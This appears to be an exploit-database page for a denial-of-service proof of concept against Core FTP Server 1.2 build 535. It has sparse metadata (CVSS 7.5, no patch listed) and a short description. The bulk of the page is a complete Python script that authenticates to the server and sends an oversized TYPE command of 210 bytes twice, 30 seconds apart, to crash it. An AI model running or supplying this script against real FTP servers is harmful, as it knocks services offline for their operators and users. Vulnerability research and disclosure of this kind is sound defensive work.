Core FTP Server Version 1.2, build 535, 32-bit - Crash P.O.C.

vendor:

Core FTP Server

by:

7.5

CVSS

HIGH

Denial of Service

CWE

Product Name: Core FTP Server

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Core FTP Server Version 1.2, build 535, 32-bit – Crash P.O.C.

This script exploits a vulnerability in Core FTP Server version 1.2, build 535, 32-bit, causing it to crash. It takes the host, port, username, and password as command line arguments. The script then attempts to connect to the remote Core FTP Server and authenticate. After sending a first buffer of bad data, it waits for 30 seconds and sends a second buffer of bad data. This causes the server to crash, resulting in a denial of service.

Mitigation:

Source

Exploit-DB raw data:

#!/usr/bin/python

import socket,sys,time

def Usage():
        print ("Core FTP Server Version 1.2, build 535, 32-bit - Crash P.O.C.")
        print ("Usage: ./coreftp_dos.py <host> <port> <username> <password>")
        print ("Ex:    ./coreftp_dos.py 192.168.10.10 21 ftp ftp\n")

if len(sys.argv) <> 5:
        Usage()
        sys.exit(1)
else:
        host=sys.argv[1]
        port=sys.argv[2]
        user=sys.argv[3]
        passwd=sys.argv[4]
        evil = '\x41' * 210
        print "[+] Trying to crash Core FTP server with " + str(len(evil)) + " buffer bytes"
        print "[+] Host: " + host + " Port: " + port + " User: " + user + " Pass: " + passwd
        print "[+] Attempting to connect to the remote Core FTP Server..."
        first = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        port=int(port)
        try:
                connect = first.connect((host, port))
        except:
                print "[-] There was an error while trying to connect to the remote FTP Server"
                sys.exit(1)
        print "[+] Connection to remote server successfully... now trying to authenticate"
        first.recv(1024)
        first.send('USER ' + user + '\r\n')
        first.recv(1024)
        first.send('PASS ' + passwd + '\r\n')
        first.recv(1024)
        first.send('dir\r\n');
        first.send('TYPE ' + evil + '\r\n')
        try:
                first.recv(1024)
        except:
                print "[-] Couldn\'t authenticate in the remote FTP server"
                sys.exit(1)
        print "[+] First buffer was sent, waiting 30 seconds to send a second time with some more bad data..."
        first.close()
        second = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        time.sleep(30)
        try:
                connect = second.connect((host, port))
        except:
                print "[-] FTP Server isn\'t responding... it might had successfully crashed."
                sys.exit(1)
        second.send('USER ' + user + '\r\n')
        second.recv(1024)
        second.send('PASS ' + passwd + '\r\n')
        second.recv(1024)
        second.send('TYPE ' + evil + '\r\n')
        second.recv(1024)
        print "[+] By now, Core FTP Server should had crashed and will not accept new connections."
        second.close()
        sys.exit(0)